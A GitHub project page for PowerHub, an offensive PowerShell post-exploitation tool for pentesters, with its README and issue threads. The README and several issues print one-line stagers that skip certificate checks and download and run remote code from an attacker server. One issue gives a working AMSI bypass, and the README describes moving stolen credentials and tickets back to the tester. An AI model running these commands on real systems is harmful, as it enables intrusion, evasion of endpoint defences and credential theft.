adrianvollmer / powerhub Goto Github PK

A post exploitation tool based on a web application, focusing on bypassing endpoint protection and application whitelisting

Home Page: https://adrianvollmer.github.io/PowerHub/

License: MIT License

Python 1.75% JavaScript 0.06% CSS 0.03% HTML 0.24% PowerShell 97.79% C 0.01% C# 0.02% VBScript 0.03% Jinja 0.04% Makefile 0.02%

python pentest powershell post-exploitation remote-admin-tool

powerhub's Introduction

PowerHub

PowerHub is a convenient post exploitation tool for PowerShell which aids a pentester in transferring data, in particular code which may get flagged by endpoint protection. Features:

Fileless
Stateless
Cert pinning
String "obfuscation" by RC4 encryption
Choose your AMSI Bypass
Transparent aliases for in-memory execution of C# programs

During an engagement where you have a test client available, one of the first things you want to do is run SharpHound, Seatbelt, PowerUp, Invoke-PrivescCheck or PowerSploit. So you need to download the files, mess with endpoint protection, disable the execution policy, etc. PowerHub provides an (almost) one-click-solution for this. Oh, and you can also run arbitrary binaries (PE and shell code) entirely in-memory using PowerSploit's modules, which is sometimes useful to bypass application whitelisting.

Your loot (Kerberos tickets, passwords, etc.) can be easily transferred back either as a file or a text snippet, via the command line or the web interface. PowerHub also helps with collaboration in case you're a small team.

Here is a simple example (grab information about local groups with PowerView and transfer it back):

PS C:\Users\avollmer> [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$Nxois='bZeVBC4vZfakT5SmCcaFam6IRY6UNLnC';$Plukgmio=New-Object Net.WebClient;IEX $Plukgmio.DownloadString('https://192.168.11.2:8443/')
  _____   _____  _  _  _ _______  ______ _     _ _     _ ______
 |_____] |     | |  |  | |______ |_____/ |_____| |     | |_____]
 |       |_____| |__|__| |______ |    \_ |     | |_____| |_____]
2.0.0                       written by Adrian Vollmer, 2018-202
Run 'Help-PowerHub' for help
PS C:\Users\avollmer> Get-HubModule PowerView

Name   : /home/avollmer/.local/share/powerhub/modules/PowerSploit/Recon/PowerView.ps1
Type   : ps1
N      : 205
Loaded : True
Alias  :

PS C:\Users\avollmer> Get-LocalGroup | PushTo-Hub -Name groups.json

Documentation

Read the docs here.

Installation: https://adrianvollmer.github.io/PowerHub/latest/installation.html
Usage: https://adrianvollmer.github.io/PowerHub/latest/usage.html
Contributing: https://adrianvollmer.github.io/PowerHub/latest/contrib.html
Changelog: https://adrianvollmer.github.io/PowerHub/latest/changelog.html

Credits

PowerHub is partially based on the awesome work of zc00l, @am0nsec, mar10, p3nt4. And of course, it would be nothing without @harmj0y, @mattifestation and the many other contributors to PowerSploit.

Thanks!

Author and License

Adrian Vollmer, 2018-2023. MIT License.

Disclaimer

Use at your own risk. Do not use without full consent of everyone involved. For educational purposes only.

powerhub's People

Contributors

Stargazers

Watchers

Forkers

poeblu jbarcia halbachb alekslt shantanu561993 l9sk avgirl raystyle h1d3r a-min3 maleus odomrob z3v2cicidi thezedwards badbiddy averroes bbhunter jack51706 qsdj keystroke95 khr0x40sh doanhnhq-uit mesutozsoycom johndoex1 ro9ueadmin beerandgin skirankumar nbg0x1 minkione macdaliot 3453-315h techbytom idkwim inspectordidi johnjohnsp1 m00zh33 askyeye mav8140 sasqwatch snollyg0st3r yehias ibrahimcheik hackmeany rajivraj mrthomas108 drinkme usama7628674 https-github-com-lychhayly lychhayly kaisaryousuf red-infosec pestersec 5l1v3r1 nrojas9 preventions gh057pr1nc3 pradeep7380 mushfiqur47 ahmedsakrr oldsecureiqlab muhammadabubakar gh0st0ne rurbin3 cert-org malwr-io whoami2323 ruytaan mrcakeguy pingcto mohinparamasivam rns-sec chaos-monkey-island 4v4loon ismaeel77 securityanalysts chenliang100 killvxk patrikcoch123 longjoe76 justinforbes macsecurity gl4ssesbo1 tehseensagar readloud crimsonlabs-io 0xajstrike aalbng marcostolosa startagain2016 hartl3y94 ville87 pfiatde xtenex apkc lennon-mawele mav51 0xsojalsec stnert drakevonduck vaginessa

powerhub's Issues

Create a nicer CSS

I suck at CSS, so if somebody wants to help me to add some eye candy, be my guest. I like a sleek, simple, minimal but aesthetic style.

Make clipboard persistent

This will require a database, probably sqlite. Where should it be stored? Probably somwhere in $HOME

Fix the tool tips of shells in the receiver tab

I want the popover to contain an HTML table. That doesn't seem to be straight forward to do with bootstrap. Certainly possible, but I suck at CSS/JS.

Avoid Write-Host

Use Write-Verbose or something to make the script more PoSh idiomatic

issue with Run-EXE

Hi,

I am having issues with the example provided for run-exe with a meterpreter exe. I get an error about DEP compatibility and then it closes the powershell window. Am I doing something wrong?

PowerShellMafia/PowerSploit#362 not sure if this is similar

Implement push notifications with flask

Using websockets. Something like this: https://gist.github.com/guyromm/858806

For instance, a new reverse shell coming in should cause a notification.

Uri path

powerhub.py: error: the following arguments are required: URI_HOST
What to indicate here? IP? Ip my server?

Add more shell transport methods

Reverse HTTP, DNS, perhaps UDP, ... many things are possible

Provide webapp alternative without JS

The fancy looking webapp uses Bootstrap, parts of which require jQuery, which doesn't support IE8 or lower. It would be nice to be able to use the webapp without an JS at all.

Use ad hoc ssl cert if there is none

Automatically add/remove shell entries

Currently, the user needs to reload the page. Since we now have push notifications for events like a new incoming shell, the card list should update automatically

Display the progress stream somehow

This is used rarely by some Cmdlets. Still, would be nice to have

Make reverse shell more persistent

Keep alive in the background and try to reconnect to the receiver every 5 seconds or so. Don't forget a maximum life time with a default value of 5 days.

1.3 fails to show installed modules

Been in love with this tool and its honestly a masterpiece.

One issue with the new version 1.3 ...
When I updated from 1.2 to 1.3 I lost the ability to view my installed modules.

I have remedied this by staying at 1.2 but would like to hop on 1.3 due to the TLS jawn.

Windows 7 compatibility

As briefly described via email, the stager throws errors when executing it on Windows 7 with PS 2.

Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. Alle Rechte vorbehalten.

PS C:\Users\foouser> [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$K=new-object net.w
ebclient;IEX $K.downloadstring('https://192.168.1.10:8000/0');
Ausnahme beim Aufrufen von "Disable" mit 0 Argument(en):  "Methode nicht gefunden: "IntPtr System.IntPtr.op_Addition(In
tPtr, Int32)"."
Bei Zeile:1 Zeichen:23
+ [Bypass.AMSI]::Disable <<<< ()
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DotNetMethodException

Sie können keine Methode für einen Ausdruck mit dem Wert NULL aufrufen.
Bei Zeile:82 Zeichen:82
+ $settings = [Ref].Assembly.GetType($string2).GetField($string3,$string4).GetValue <<<< ($null);
    + CategoryInfo          : InvalidOperation: (GetValue:String) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

In einem NULL-Array kann kein Index erstellt werden.
Bei Zeile:83 Zeichen:11
+ $settings[ <<<< $string5] = @{}
    + CategoryInfo          : InvalidOperation: (HKEY_LOCAL_MACH...iptBlockLogging:String) [], RuntimeException
    + FullyQualifiedErrorId : NullArray

In einem NULL-Array kann kein Index erstellt werden.
Bei Zeile:84 Zeichen:11
+ $settings[ <<<< $string5].Add($string6, "0")
    + CategoryInfo          : InvalidOperation: (HKEY_LOCAL_MACH...iptBlockLogging:String) [], RuntimeException
    + FullyQualifiedErrorId : NullArray

Probably because there is no AMSI on Win7.

Related #17

Otherwise, great tool :)

Figure out compatibility with older PowerShell versions

I developed the reverse shell by testing it on PS 5.1.17134.590, Windows 10.0.17134.590. Some features certainly won't work on older versions. It's important to have a fall back to a dumber shell in case the system is old. Let's aim at supporting everything down to PSv2.

Log messages from flask now contain the datetime twice

Override the RequestHandler to fix this

Figure out tab completion in PowerShell commands

For example run-exe Mimi<TAB> should complete to run-exe Mimikatz.exe

Create Aliases

lhm -> Load-HubModule
pth -> PushTo-Hub

RuntimeError: Working outside of application context

Suddenly a weird error occurs when starting powerhub. Since nothing has changed for a while, maybe it is according to some updated dependency?

$ powerhub --auth xxx:xxx 192.168.122.244
I 2022-10-20 13:30:40 Importing modules...
Traceback (most recent call last):
  File "/home/user/repos/PowerHub/venv/bin/powerhub", line 8, in <module>
    sys.exit(main())
  File "/home/user/repos/PowerHub/venv/lib/python3.10/site-packages/powerhub/__main__.py", line 8, in main
    PowerHubApp().run(background=background)
  File "/home/user/repos/PowerHub/venv/lib/python3.10/site-packages/powerhub/app.py", line 66, in __init__
    self.init_db()
  File "/home/user/repos/PowerHub/venv/lib/python3.10/site-packages/powerhub/app.py", line 111, in init_db
    init_db(db)
  File "/home/user/repos/PowerHub/venv/lib/python3.10/site-packages/powerhub/sql.py", line 18, in init_db
    _db.create_all()
  File "/home/user/repos/PowerHub/venv/lib/python3.10/site-packages/flask_sqlalchemy/extension.py", line 868, in create_all
    self._call_for_binds(bind_key, "create_all")
  File "/home/user/repos/PowerHub/venv/lib/python3.10/site-packages/flask_sqlalchemy/extension.py", line 839, in _call_for_binds
    engine = self.engines[key]
  File "/home/user/repos/PowerHub/venv/lib/python3.10/site-packages/flask_sqlalchemy/extension.py", line 628, in engines
    app = current_app._get_current_object()  # type: ignore[attr-defined]
  File "/home/user/repos/PowerHub/venv/lib/python3.10/site-packages/werkzeug/local.py", line 513, in _get_current_object
    raise RuntimeError(unbound_message) from None
RuntimeError: Working outside of application context.

This typically means that you attempted to use functionality that needed
the current application. To solve this, set up an application context
with app.app_context(). See the documentation for more information.

Here a list of the dependencies I got after a fresh install.

$ python --version
Python 3.10.7

$ pip freeze
aesedb==0.1.0
aiosmb==0.4.3
aiowinreg==0.0.7
asn1crypto==1.5.1
asyauth==0.0.6
asysocks==0.2.2
attrs==22.1.0
Automat==20.2.0
bidict==0.22.0
cffi==1.15.1
cheroot==8.6.0
click==8.1.3
colorama==0.4.5
constantly==15.1.0
cryptography==38.0.1
defusedxml==0.7.1
Flask==2.2.2
Flask-SocketIO==5.3.1
Flask-SQLAlchemy==3.0.2
greenlet==1.1.3.post0
hyperlink==21.0.0
idna==3.4
incremental==22.10.0
itsdangerous==2.1.2
jaraco.functools==3.5.2
Jinja2==3.1.2
json5==0.9.10
MarkupSafe==2.1.1
minidump==0.0.21
minikerberos==0.3.3
more-itertools==9.0.0
msldap==0.4.6
oscrypto==1.3.0
PowerHub @ file:///home/user/repos/PowerHub
prompt-toolkit==3.0.31
pyasn1==0.4.8
pyasn1-modules==0.2.8
pycparser==2.21
pycryptodomex==3.15.0
pyOpenSSL==22.1.0
pypykatz==0.6.2
python-engineio==4.3.4
python-magic==0.4.27
python-socketio==5.7.2
PyYAML==6.0
service-identity==21.1.0
six==1.16.0
SQLAlchemy==1.4.42
tqdm==4.64.1
Twisted==22.8.0
typing_extensions==4.4.0
unicrypto==0.0.9
watchdog==2.1.9
wcwidth==0.2.5
Werkzeug==2.2.2
winacl==0.1.5
WsgiDAV==4.0.2
zope.interface==5.5.0

Add support for workspaces

... and make it possible for relevant data to be stored in a custom directory.

Add ability to cancel remote job

When pressing CTRL-C in the shell, one option one would like to do is to cancel the currently running job, maybe because it is taking too long. We'd have to move from using $PowerShell.Invoke() to $PowerShell.BeginInvoke() to run the jobs asynchronously.

Clipboard: Export button and delete-all button

Also, fix the bug when trying to delete multiple entries one after the other (use some ID instead of position in list)

Modules get not properly imported

Since 4c706b7, modules get not properly imported. PowerShell cannot find the commands:

> lhm SharpHound
Name                                    Type N  Loaded
----                                    ---- -  ------
ps1/BloodHound/Ingestors/SharpHound.ps1 ps1  30   True

> Invoke-BloodHound -CollectionMethod All -Domain test.local -LDAPUser test -LDAPPass test
The term 'Invoke-BloodHound' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
    + CategoryInfo          : ObjectNotFound: (Invoke-BloodHound:String) [Invoke-Expression], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException,Microsoft.PowerShell.Commands.InvokeExpressionCommand

Encrypt the DLL in transit

Use of multiple crypto libraries

On dev branch, requirements.txt currently lists pycryptodome as a dependency for AES encryption. Though, when running powerhub.py, it errors out with ModuleNotFoundError: No module named 'Cryptodome'.

This is because the package pycryptodome actually makes available a module named Crypto. The module Cryptodome you use here is instead contained in a package named pycryptodomex. So the entry in requirements.txt should probably be fixed.

I also noticed, that PowerHub makes use of pyOpenSSL for key and certificate handling.
The project page of pyOpenSSL states:

Note: The Python Cryptographic Authority strongly suggests the use of pyca/cryptography where possible. If you are using pyOpenSSL for anything other than making a TLS connection you should move to cryptography and drop your pyOpenSSL dependency.

That cryptography package is also already present, currently as a dependency of service_identity.

So PowerHub currently has pycryptodome/pycryptodomex, pyOpenSSL and cryptography installed. I bet one of them is sufficient (probably cryptography) but I haven't looked into the details.

Twisted exceptions

This came already up in another issue but just to keep track of it, twisted occasionally throws exceptions, cluttering the output of PowerHub.

Unhandled Error
Traceback (most recent call last):
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/python/log.py", line 103, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/python/log.py", line 86, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/python/context.py", line 122, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/python/context.py", line 85, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/internet/posixbase.py", line 614, in _doReadOrWrite
    why = selectable.doRead()
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/internet/tcp.py", line 243, in doRead
    return self._dataReceived(data)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/internet/tcp.py", line 249, in _dataReceived
    rval = self.protocol.dataReceived(data)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/protocols/basic.py", line 579, in dataReceived
    why = self.rawDataReceived(data)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/web/http.py", line 645, in rawDataReceived
    self.handleResponsePart(data)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/web/proxy.py", line 77, in handleResponsePart
    self.father.write(buffer)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/web/server.py", line 238, in write
    http.Request.write(self, data)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/web/http.py", line 1118, in write
    self.channel.writeHeaders(version, code, reason, headers)
builtins.AttributeError: 'NoneType' object has no attribute 'writeHeaders'

Unhandled Error
Traceback (most recent call last):
  File "/home/user/Downloads/PowerHub/powerhub/reverseproxy.py", line 78, in run_proxy
    reactor.run()
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/internet/base.py", line 1272, in run
    self.mainLoop()
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/internet/base.py", line 1284, in mainLoop
    self.doIteration(t)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/internet/epollreactor.py", line 235, in doPoll
    log.callWithLogger(selectable, _drdw, selectable, fd, event)
--- <exception caught here> ---
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/python/log.py", line 103, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/python/log.py", line 86, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/python/context.py", line 122, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/python/context.py", line 85, in callWithContext
    return func(*args,**kw)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/internet/posixbase.py", line 627, in _doReadOrWrite
    self._disconnectSelectable(selectable, why, inRead)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/internet/posixbase.py", line 258, in _disconnectSelectable
    selectable.connectionLost(failure.Failure(why))
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/internet/tcp.py", line 519, in connectionLost
    self._commonConnection.connectionLost(self, reason)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/internet/tcp.py", line 327, in connectionLost
    protocol.connectionLost(reason)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/web/http.py", line 599, in connectionLost
    self.handleResponseEnd()
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/web/proxy.py", line 87, in handleResponseEnd
    self.father.finish()
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/web/server.py", line 249, in finish
    return http.Request.finish(self)
  File "/home/user/Downloads/PowerHub/venv/lib/python3.7/site-packages/twisted/web/http.py", line 1046, in finish
    "Request.finish called on a request after its connection was lost; "
builtins.RuntimeError: Request.finish called on a request after its connection was lost; use Request.notifyFinish to keep track of this.

Write test cases

Use nginx as a reverse proxy

I'm reluctant to include nginx as a dependency, but twisted is simply not powerful enough. It can't set the X-Forwaded-Host header, so when Flask redirects to a different URL, it doesn't know the host or protocol which the client used to initiate the request.

I'll try to not make it a mandatory dependency, such that everything runs without. However, SSL likely won't work. This must be why everyone discourages the use of SSL with Flask directly. Not a production server, and so on...

Save shell log automatically

It's important because you may lose valuable data otherwise. Again, we should store it somewhere in $HOME, just like the persistent clipboard (#25). $XDG_DATA_HOME should be fine.

Credetials for webdav

Would you please extend the usage for login credentials to webdav as well?

Listing and loading hub modules

Currently, payload.ps1 contains full paths to the available modules.
E.g. /home/user/.local/share/powerhub/modules/ps1/PowerSploit/Recon/PowerView.ps1.

Is this information really needed on the target side?
It contains details like the attacker's name and directories, which might be sensitive.

Furthermore the length of the full path can be a problem for the layout of the lshm table.
I have seen output where it got truncated at the end, cutting off the actual name of the script (making them indistinguishable).

I would like to propose to strip the module path from the module names.
E.g. the line from above becomes ps1/PowerSploit/Recon/PowerView.ps1.
That's both, shorter and more privacy preserving.

While talking about the lshm table:
From a user's perspective, I don't really know what the code column is about.
I only notice it has a value once the module is loaded.
Again, this column is so wide, it destroys the table layout, since it leads to a line wrap.

Since I guess the code is only an internal identifier, it would be great to not display the code.
Instead, a short column stating something like loaded would be great, to see which modules are already present.

(Then, I'm still confused why lhm 8 does not work, while lhm 08 does.
But since you already documented that in the help, I guess there is no easy fix.
So feel free to ignore this complain :P )

Thanks again for your work!

Support other encodings than UTF-8 in PS1 modules

I wanted to load PrivescCheck from PowerHub but it failed. Here what happened:

First, I tried to load PowerHub (current version on master) but it was detected by AMSI. So I needed to apply a manual bypass first:

PS C:\Users\User>  $K=New-Object Net.WebClient;IEX $K.DownloadString('http://example.org:8080/0?t=http&a=reflection');
IEX : In Zeile:1 Zeichen:1
+
Das Skript enthält schädliche Daten und wurde von Ihrer Antivirensoftware blockiert.
In Zeile:1 Zeichen:30
+ ... t.WebClient;IEX $K.DownloadString('http://example.org:8080/0?t=http&a= ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand

PS C:\Users\User> $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
PS C:\Users\User>  $K=New-Object Net.WebClient;IEX $K.DownloadString('http://example.org:8080/0?t=http&a=reflection');
True
  _____   _____  _  _  _ _______  ______ _     _ _     _ ______
 |_____] |     | |  |  | |______ |_____/ |_____| |     | |_____]
 |       |_____| |__|__| |______ |    \_ |     | |_____| |_____]
                            written by Adrian Vollmer, 2018-2021
Run 'Help-PowerHub' for help

Then I tried loading PrivescCheck but it failed with syntax errors. Note that PowerHub is able to load another module like PrivescCheckOld flawlessly:

PS C:\Users\User> lshm

N Type Name                          Loaded
- ---- ----                          ------
0 ps1  ps1/PrivescCheck.ps1          False
1 ps1  ps1/PrivescCheckOld.ps1       False
2 ps1  ps1/BloodHound/AzureHound.ps1 False
3 ps1  ps1/BloodHound/SharpHound.ps1 False


PS C:\Users\User> lhm 0
Import-HubModule : Ausnahme beim Aufrufen von "Create" mit 1 Argument(en):  "In Zeile:80 Zeichen:58
+     [CmdletBinding()] param(
+                                                          ~
Schließende ")" fehlt in einem Ausdruck.
In Zeile:76 Zeichen:100
+ ... -FromBase64CompressedScriptBlock {
+                                                                        ~
Die schließende "}" fehlt im Anweisungsblock oder der Typdefinition.
In Zeile:86 Zeichen:10
+     )
+          ~
Unerwartetes Token ")" in Ausdruck oder Anweisung.
In Zeile:98 Zeichen:108
+ ... Object System.IO.MemoryStream(, $Sc ...
+                                                                 ~
Argument in der Parameterliste fehlt.
In Zeile:114 Zeichen:2
+ }
+  ~
Unerwartetes Token "}" in Ausdruck oder Anweisung."
In Zeile:240 Zeichen:13
+             Import-HubModule $_
+             ~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Import-HubModule], MethodInvocationException
    + FullyQualifiedErrorId : ParseException,Import-HubModule

PS C:\Users\User> lhm 1

Name                    Type N Loaded
----                    ---- - ------
ps1/PrivescCheckOld.ps1 ps1  1   True

But I don' think it's a problem with PrivescCheck itself, because I can load it directly with

PS C:\Users\User> IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1")
PS C:\Users\User>

So I assume a PowerHub bug?

SSL support

include wsgidav

Do something about Logging

Source: https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/

AttributeError: module 'eventlet.green.select' has no attribute 'epoll'

AttributeError for python version 3.11.4 module 'eventlet.green.select' has no attribute 'epoll'

To Reproduce
Steps to reproduce the behavior:
git clone https://github.com/AdrianVollmer/PowerHub.git
apt-get install mono-mcs gcc-mingw-w64-x86-64 gcc-mingw-w64-i686
python3 -m pip install powerhub

powerhub 192.168.1.19 --auth powerhub:test123

Python log:

Python versions (please complete the following information):

Output of pip freeze:

Tab Completion in reverse shell with spaces does not work properly

For example: cd C:\ ; cd Progr<TAB>

Expected result: cd '.\Program Files'

Make reverse shell log accessible through flask

Let's pop up a modal containing the shell log

Receiver discontinued?

In old versions of powerhub there seems to have been a receiver option that allowed to catch a reverse connection with the client.

This is a very useful feature. Can it be reimplemented?

Regards

Darren

Failed to load in target system : unable to connect to server

i tried with both the pip packages and github installation. the server is up and the client can connect and GET some of the scripts but after a few seconds troughs an error.

Defender Trojan:Win32/AmsiTamper.A!ams

Not sure if i am missing something, But i get flag by defender as Trojan:Win32/AmsiTamper.A!ams

OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.17763 N/A Build 17763

Defender 1.289.1512.0

Obfuscate Reverse Shell

It should use the session key and RC4 to obfuscate the data stream. I hesitate to call it "encryption", because there is no integrity or authenticity, but the main reason we want this is to make it impossible to fingerprint by an AV.

Passing arguments in Run-DotNetExe not working properly

For example, passing this to Seatbeld doesn't work:

-Arguments '-group=all -outputfile=file.txt'

Seatbelt says all -outputfile=file.txt is not a valid group.

So clearly something goes wrong when parsing the arguments. Might affect other Run-* Cmdlets, too.

Create a favicon

Powerhub doesn't deliver the full certificate chain when using custom certs

Missing positional argument when starting powerhub

I am running powerhub like this:
powerhub 192.168.1.32

But get the following error:

I 2023-04-25 17:48:32 Generating new Diffie-Hellman parameters
Traceback (most recent call last):
  File "/usr/local/bin/powerhub", line 8, in <module>
    sys.exit(main())
  File "/usr/local/lib/python3.8/dist-packages/powerhub/__main__.py", line 13, in main
    PowerHubApp(args).run(background=background)
  File "/usr/local/lib/python3.8/dist-packages/powerhub/app.py", line 72, in __init__
    self.init_flask()
  File "/usr/local/lib/python3.8/dist-packages/powerhub/app.py", line 118, in init_flask
    from powerhub.flask import app as flask_blueprint
  File "/usr/local/lib/python3.8/dist-packages/powerhub/flask.py", line 22, in <module>
    from powerhub.hiddenapp import hidden_app
  File "/usr/local/lib/python3.8/dist-packages/powerhub/hiddenapp.py", line 13, in <module>
    from powerhub.dhkex import DH_G, DH_MODULUS, DH_ENDPOINT
  File "/usr/local/lib/python3.8/dist-packages/powerhub/dhkex.py", line 73, in <module>
    generate_diffie_hellman_params()
  File "/usr/local/lib/python3.8/dist-packages/powerhub/dhkex.py", line 21, in generate_diffie_hellman_params
    parameters = dh.generate_parameters(generator=g, key_size=KEY_SIZE)
TypeError: generate_parameters() missing 1 required positional argument: 'backend'

I installed it like suggested with pip.

Make tab completion in shell more efficient

Currently, readline sends a ShellPacket for every possible completion text. The list should be transferred at once and then cycled through locally.

Vulnerability disclosure?

Hi AdrianVollmer,

I believe I may have found some potential vulnerabilities in PowerHub. Is there a way to privately disclose them to you, or should I open an (public) issue here?

BR
six-two